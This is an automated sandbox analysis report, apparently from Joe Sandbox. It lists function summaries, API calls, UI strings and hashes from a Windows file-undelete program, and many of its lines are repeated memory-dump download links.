Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: MessageSend
String ID: Software\SeriousBit\MyUnDelete\Images
API String ID: 3850602802-630463975
Opcode ID: fc1549703984a7bd3bd10b2f3281940f2ade411c2687d38e7a59f772265011e5
Instruction ID: ae8683d21918e9576fce804ea522b87153238774bf13635d19d2001cbcaeeabf
Opcode Fuzzy Hash: fc1549703984a7bd3bd10b2f3281940f2ade411c2687d38e7a59f772265011e5
Instruction Fuzzy Hash: B1514B70D00328DFDB28DF94C858BEEB7B5FB44304F50419AE919A7292DB786A89CF54

Function 0041A82B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 111stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 0041A847
lstrlenW.KERNEL32(?), ref: 0041A892
_wcslen.LIBCMT ref: 0041A8BC

Strings

System, xrefs: 0041A843

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: GlobalLock_wcslenlstrlen
String ID: System
API String ID: 2647411976-3470857405
Opcode ID: 35fd0ae7f3e9e09fbbec43fba4f2a763b3a9432c6119488b94bcba3afebf07cf
Instruction ID: 24ce1ddab4104677acd396531790d5cd7a388472ffdba777ba1e320809a7f601
Opcode Fuzzy Hash: 35fd0ae7f3e9e09fbbec43fba4f2a763b3a9432c6119488b94bcba3afebf07cf
Instruction Fuzzy Hash: 954112B1901115EFCB14EF64C8455AEB7B9FF00314F14852AE812D7241E7389EE1CB9A

Function 00446710 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 0044BA80: CreateWindowExW.USER32(00020000,My control,00478E64,50000000,?,?,?,?,00000002,00000000,?,?), ref: 0044BB08
Part of subcall function 0044BA80: GetClientRect.USER32(?,?), ref: 0044BB1F
Part of subcall function 0044BA80: GetLastError.KERNEL32(?,00442A50,?,?,00000002,?), ref: 0044BB3F

ResetEvent.KERNEL32(?,00000000,00000008,00000000), ref: 004467A3
ResetEvent.KERNEL32(?), ref: 004467AF

Strings

2, xrefs: 00446728
h#I, xrefs: 0044686F
I, xrefs: 00446736

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: EventReset$ClientCreateErrorLastRectWindow
String ID: 2$I$h#I
API String ID: 969173564-3010673337
Opcode ID: 52fe93c52996db12140667952ba4e43c796c3ae52a00564f2766c56be1c85de4
Instruction ID: 43269c91cdf039f52669aa33afbdd9d92f5ca5ccf925a0da008ef11e70554b2d
Opcode Fuzzy Hash: 52fe93c52996db12140667952ba4e43c796c3ae52a00564f2766c56be1c85de4
Instruction Fuzzy Hash: F3419FB0A00209DFDB04DF94D996BBFBBB6FB44308F104229E6056B391C7B56945CF9A

Function 0044D110 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(0044D482,00000000,00000000,00000000,?,?,?,?,?,0044D482,00000000), ref: 0044D135

Strings

UndeleteMyFiles, xrefs: 0044D1BD
Not enough free space to recover all files.Proceed anyway?, xrefs: 0044D15F
UndeleteMyFiles, xrefs: 0044D15A
There is low disk space, some files may not be recovered.Proceed anyway?, xrefs: 0044D1C2

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: DiskFreeSpace
String ID: Not enough free space to recover all files.Proceed anyway?$There is low disk space, some files may not be recovered.Proceed anyway?$UndeleteMyFiles$UndeleteMyFiles
API String ID: 1705453755-1140478308
Opcode ID: 0e0d7f5307107e51a127c239dde1973ee5fece72d8099f596bd8161d0ba63b4b
Instruction ID: 10be201569dd27961f1b075db873cf8285c4298e56d09b4b82807a6d08a9e6ee
Opcode Fuzzy Hash: 0e0d7f5307107e51a127c239dde1973ee5fece72d8099f596bd8161d0ba63b4b
Instruction Fuzzy Hash: 43213170E40209BBEB14DF94CC81FAFB7B5AB44740F20855BF915EB290D778AA41CB99

Function 0040D0F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Edit, xrefs: 0040D145

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: bd62673e1da4c79a29dd08752097781f0b7e9f1ed5cf022aa7783b7257555103
Instruction ID: ce4d7d68a92b6d64b0c957ecb7c7635091818909401a268db0902fc5d6b9243a
Opcode Fuzzy Hash: bd62673e1da4c79a29dd08752097781f0b7e9f1ed5cf022aa7783b7257555103
Instruction Fuzzy Hash: 4511E530B0020177DA30AAA2EC09B67B6A9AF51B54F140537F852FA1E0EFB9DC56C55D

Function 00446500 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 0044650F
ResetEvent.KERNEL32(?), ref: 00446533
SetEvent.KERNEL32(?), ref: 00446548

Strings

Are your sure you want to cancel the scan?, xrefs: 0044651C
Warning!, xrefs: 00446517

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Event$Reset
String ID: Are your sure you want to cancel the scan?$Warning!
API String ID: 926831536-1087030844
Opcode ID: 2360599075192d8e6d743864ff232b9a4b495cb1c51e01dac16333f109cf99e4
Instruction ID: 23290a737a827566b668097f3f41a19f63963e1145aa076a0931b9a081b2d8fc
Opcode Fuzzy Hash: 2360599075192d8e6d743864ff232b9a4b495cb1c51e01dac16333f109cf99e4
Instruction Fuzzy Hash: E2F082B4904314BFD710EF90EC199993BBAE704305F5085BAF50453260D7745A458B4E

Function 004323B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004323CB

Part of subcall function 0042DD57: __getptd_noexit.LIBCMT ref: 0042DD5A
Part of subcall function 0042DD57: __amsg_exit.LIBCMT ref: 0042DD67

__getptd.LIBCMT ref: 004323DC
__getptd.LIBCMT ref: 004323EA

Strings

MOC, xrefs: 004323BD
csm, xrefs: 004323C4

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
